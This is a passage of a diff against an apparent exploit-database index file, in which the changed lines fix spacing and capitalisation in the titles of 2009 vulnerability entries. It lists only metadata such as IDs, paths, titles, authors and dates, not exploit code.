Injections",2009-05-07,YEnH4ckEr,php,webapps,0 @@ -8159,7 +8160,7 @@ id,file,description,date,author,platform,type,port 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / File Upload",2009-05-11,ahmadbady,php,webapps,0 8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Transversal",2009-05-11,StAkeR,php,webapps,0 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0 -8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 - '.mcp'Universal Seh Overwrite",2009-05-11,His0k4,windows,local,0 +8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 - '.mcp' Universal Seh Overwrite",2009-05-11,His0k4,windows,local,0 8657,platforms/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,windows,local,0 8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution Exploit",2009-05-12,Nine:Situations:Group,php,webapps,0 @@ -8173,7 +8174,7 @@ id,file,description,date,author,platform,type,port 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service (PoC)",2009-05-13,mu-b,multiple,dos,0 -8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 - '.hfz'Directory Traversal",2009-05-13,Nine:Situations:Group,windows,local,0 +8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 - '.hfz' Directory Traversal",2009-05-13,Nine:Situations:Group,windows,local,0 8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0 8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Privilege Escalation",2009-05-13,s0m3b0dy,linux,local,0 @@ -8277,7 +8278,7 @@ id,file,description,date,author,platform,type,port 8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS x / 156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié ",windows,dos,0 8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-26,YEnH4ckEr,php,webapps,0 8779,platforms/php/webapps/8779.txt,"Joomla Boy Scout Advancement 0.3 - 'id' SQL Injection",2009-05-26,YEnH4ckEr,php,webapps,0 -8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - '.mp3'Local Overflow",2009-05-26,Nine:Situations:Group,windows,local,0 +8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow",2009-05-26,Nine:Situations:Group,windows,local,0 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0 8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - (ps_drv.sys) Privilege Escalation",2009-05-26,"NT Internals",windows,local,0 8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0 @@ -8344,7 +8345,7 @@ id,file,description,date,author,platform,type,port 8846,platforms/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,hardware,remote,0 8847,platforms/php/webapps/8847.txt,"Joomla Component Joomlaequipment 2.0.4 - (com_juser) SQL Injection",2009-06-01,"Chip d3 bi0s",php,webapps,0 8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 - (article_view_photo.php id) SQL Injection",2009-06-01,taRentReXx,php,webapps,0 -8849,platforms/asp/webapps/8849.txt,"R2 Newsletter Lite/Pro/Stats - 'admin.mdb'Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps,0 +8849,platforms/asp/webapps/8849.txt,"R2 Newsletter Lite/Pro/Stats - 'admin.mdb' Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps,0 8850,platforms/php/webapps/8850.txt,"PAD Site Scripts 3.6 - Arbitrary Database Backup",2009-06-01,TiGeR-Dz,php,webapps,0 8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 - (forumspath) Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps,0 8852,platforms/php/webapps/8852.txt,"ASP Football Pool 2.3 - Remote Database Disclosure",2009-06-01,ByALBAYX,php,webapps,0 @@ -8476,7 +8477,7 @@ id,file,description,date,author,platform,type,port 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0 8988,platforms/php/webapps/8988.txt,"pc4 Uploader 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps,0 -8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - SQL / Cross-Site Scripting Injection",2009-06-22,"ThE g0bL!N",php,webapps,0 +8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - SQL Injection / Cross-Site Scripting Injection",2009-06-22,"ThE g0bL!N",php,webapps,0 8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server - Low Bandwidth Denial of Service (2)",2009-06-22,evilrabbi,multiple,dos,0 8992,platforms/php/webapps/8992.php,"phpMyAdmin - pmaPWN! Code Injection Remote Code Execution Scanner & Exploit Tool",2009-06-22,"Hacking Expose!",php,webapps,0 8993,platforms/php/webapps/8993.txt,"elgg - (Cross-Site Scripting / Cross-Site Request Forgery/Change Password) Multiple Vulnerabilities",2009-06-22,lorddemon,php,webapps,0 @@ -8570,7 +8571,7 @@ id,file,description,date,author,platform,type,port 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password Exploit",2009-07-09,rEcruit,php,webapps,0 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 -9089,platforms/php/webapps/9089.txt,"ClearContent - 'image.php url'Remote File Inclusion / Local File Inclusion",2009-07-09,MizoZ,php,webapps,0 +9089,platforms/php/webapps/9089.txt,"ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion",2009-07-09,MizoZ,php,webapps,0 9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - (.ofl) Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps,0 9092,platforms/php/webapps/9092.txt,"webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0 @@ -8620,13 +8621,13 @@ id,file,description,date,author,platform,type,port 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0 9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash Exploit",2009-07-14,prodigy,windows,remote,0 -9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE'File Disclosure",2009-07-14,cibbao,cgi,webapps,0 +9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - (.ICP) Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0 9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z - '.Mpr' Local Buffer Overflow",2009-07-14,n00b,windows,local,0 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0 -9146,platforms/windows/local/9146.pl,"Icarus 2.0 - '.ICP'Local Stack Overflow Exploit",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 +9146,platforms/windows/local/9146.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow Exploit",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - (.vib) Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0 9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - '.mpr' Buffer Overflow (SEH)",2009-07-14,His0k4,windows,local,0 9149,platforms/windows/local/9149.pl,"Icarus 2.0 - (.ICP) Local Buffer Overflow (SEH)",2009-07-15,hack4love,windows,local,0 @@ -8658,7 +8659,7 @@ id,file,description,date,author,platform,type,port 9175,platforms/multiple/dos/9175.txt,"Sguil/PADS - Remote Server Crash",2009-07-17,Ataraxia,multiple,dos,0 9176,platforms/php/webapps/9176.txt,"dB Masters Multimedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow Exploit",2009-07-16,Crazy_Hacker,windows,local,0 -9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3'Crash Exploit",2009-07-16,prodigy,windows,dos,0 +9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash Exploit",2009-07-16,prodigy,windows,dos,0 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0 9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0 9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 @@ -8669,7 +8670,7 @@ id,file,description,date,author,platform,type,port 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - '.m3u' Universal Stack Overflow",2009-07-17,Stack,windows,local,0 9187,platforms/php/webapps/9187.txt,"Joomla Component Jobline 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps,0 9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 -9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 - '.html'Universal Stack Overflow",2009-07-17,ksa04,windows,local,0 +9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 - '.html' Universal Stack Overflow",2009-07-17,ksa04,windows,local,0 9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Kernel Privilege Escalation",2009-07-17,spender,linux,local,0 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - (news.php n) SQL Injection",2009-07-17,Mr.tro0oqy,php,webapps,0 @@ -8688,7 +8689,7 @@ id,file,description,date,author,platform,type,port 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0 -9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp'Crash Exploit",2009-07-20,prodigy,windows,dos,0 +9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash Exploit",2009-07-20,prodigy,windows,dos,0 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",windows,dos,0 9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (Perl) (2)",2009-07-20,netsoul,windows,remote,0 9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 @@ -8758,7 +8759,7 @@ id,file,description,date,author,platform,type,port 9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0 9286,platforms/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,windows,local,0 -9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID'SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0 +9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0 9288,platforms/php/webapps/9288.txt,"PHPArcadeScript 4.0 - (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0 9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,php,webapps,0 9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0 @@ -8772,7 +8773,7 @@ id,file,description,date,author,platform,type,port 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - (.mpf) Local Stack Overflow (update)",2009-07-30,corelanc0d3r,windows,local,0 9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow XP SP3 (RET + SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 - Remote Dynamic Update Message Denial of Service (PoC)",2009-07-30,kingcope,multiple,dos,0 -9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - 'win32k.sys'Privilege Escalation",2009-07-30,"NT Internals",windows,local,0 +9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - 'win32k.sys' Privilege Escalation",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 - '.xbm' Local Buffer Overflow",2009-07-30,His0k4,linux,local,0 9303,platforms/windows/remote/9303.c,"VLC Media Player 0.8.6f - smb:// URI Handling Remote Buffer Overflow Exploit",2009-07-30,"Pankaj Kohli",windows,remote,0 9304,platforms/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash Exploit",2009-07-30,LiquidWorm,windows,dos,0 @@ -8843,7 +8844,7 @@ id,file,description,date,author,platform,type,port 9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 - SQL Injection",2009-08-05,Ins3t,php,webapps,0 9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-05,Moudi,php,webapps,0 9371,platforms/php/webapps/9371.txt,"opennews 1.0 - (SQL Injection / Remote Code Execution) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 -9372,platforms/php/webapps/9372.txt,"Portel 2008 - 'decide.php patron'Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0 +9372,platforms/php/webapps/9372.txt,"Portel 2008 - 'decide.php patron' Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service",2009-08-06,"Shaun Colley",freebsd,dos,0 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - '.m3u' Universal Stack Overflow (SEH)",2009-08-06,Dr_IDE,windows,local,0 9376,platforms/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - (M3U/ASX/WAX/WVX) Local Crash (PoC)",2009-09-10,Dr_IDE,windows,dos,0 @@ -8881,7 +8882,7 @@ id,file,description,date,author,platform,type,port 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (1)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps,0 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - (systemid) SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps,0 -9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - '.EOT'BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 +9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - '.EOT' BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b - (Authentication Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps,0 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 @@ -8896,7 +8897,7 @@ id,file,description,date,author,platform,type,port 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0 9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 9431,platforms/php/webapps/9431.txt,"Wordpress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 -9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini'Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0 +9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Arbitrary File Upload",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)",2009-08-14,spender,linux,local,0 @@ -8933,7 +8934,7 @@ id,file,description,date,author,platform,type,port 9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - (.mp3) Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0 9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow Exploit",2009-08-18,Wraith,windows,remote,69 9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",php,webapps,0 -9470,platforms/php/webapps/9470.txt,"PHP Email Manager - 'remove.php ID'SQL Injection",2009-08-18,MuShTaQ,php,webapps,0 +9470,platforms/php/webapps/9470.txt,"PHP Email Manager - 'remove.php ID' SQL Injection",2009-08-18,MuShTaQ,php,webapps,0 9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0 9472,platforms/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,php,webapps,0 9473,platforms/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote,0 @@ -8959,7 +8960,7 @@ id,file,description,date,author,platform,type,port 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps,0 9494,platforms/php/webapps/9494.txt,"humanCMS - (Authentication Bypass) SQL Injection",2009-08-24,next,php,webapps,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - '.wav' Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 -9496,platforms/windows/dos/9496.txt,"WAR-FTPD 1.65 - (MKD/CD Requests) Denial of Service",2009-08-24,"opt!x hacker",windows,dos,0 +9496,platforms/windows/dos/9496.txt,"War-FTPD 1.65 - (MKD/CD Requests) Denial of Service",2009-08-24,"opt!x hacker",windows,dos,0 9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - (itechd.php productid) Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0 9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclsoure",2009-08-24,"Jean Trolleur",hardware,remote,0 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0 @@ -8981,7 +8982,7 @@ id,file,description,date,author,platform,type,port 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 9517,platforms/windows/dos/9517.txt,"Lotus note connector for Blackberry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 -9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie'SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 +9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9520,platforms/multiple/local/9520.txt,"HyperVM - File Permissions Local",2009-08-25,"Xia Shing Zee",multiple,local,0 9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1)",2009-08-26,"Clément Lecigne",linux,local,0 @@ -9113,7 +9114,7 @@ id,file,description,date,author,platform,type,port 9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80 9653,platforms/php/webapps/9653.txt,"Joomla Component Turtushout 0.11 - (Name) SQL Injection",2009-09-14,jdc,php,webapps,0 9654,platforms/php/webapps/9654.php,"Joomla Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,php,webapps,0 -9655,platforms/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey'Local Buffer Overflow",2009-09-14,PLATEN,windows,local,0 +9655,platforms/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow",2009-09-14,PLATEN,windows,local,0 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",hardware,remote,0 @@ -9133,7 +9134,7 @@ id,file,description,date,author,platform,type,port 9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow (PoC)",2009-09-14,Dr_IDE,windows,dos,0 9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow Exploit (SEH)",2009-09-15,blake,windows,remote,6660 9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection",2009-09-15,snakespc,php,webapps,0 -9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId'Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0 +9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - /Scripts Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 9677,platforms/windows/dos/9677.c,"HERO SUPER PLAYER 3000 - '.m3u' Buffer Overflow (PoC)",2009-09-15,"fl0 fl0w",windows,dos,0 9680,platforms/windows/local/9680.txt,"Protector Plus Antivirus 8/9 - Privilege Escalation",2009-09-15,"Maxim A. Kulakov",windows,local,0 @@ -9231,7 +9232,7 @@ id,file,description,date,author,platform,type,port 9840,platforms/php/webapps/9840.txt,"Joomla GroupJive 1.8 B4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 -9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend'Command Injection",2009-11-05,"Core Security",multiple,remote,0 +9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection",2009-11-05,"Core Security",multiple,remote,0 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0 9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 @@ -9367,7 +9368,7 @@ id,file,description,date,author,platform,type,port 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication Username Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0 -9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend'Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 +9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Authenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP disclosure",2009-09-25,nitr0us,hardware,remote,0 @@ -9421,7 +9422,7 @@ id,file,description,date,author,platform,type,port 10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,hardware,remote,80 10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235 -10057,platforms/php/webapps/10057.txt,"Aiocp 1.4.001 - File Inclusion",2009-10-07,"Hadi Kiamarsi",php,webapps,0 +10057,platforms/php/webapps/10057.txt,"AIOCP 1.4.001 - File Inclusion",2009-10-07,"Hadi 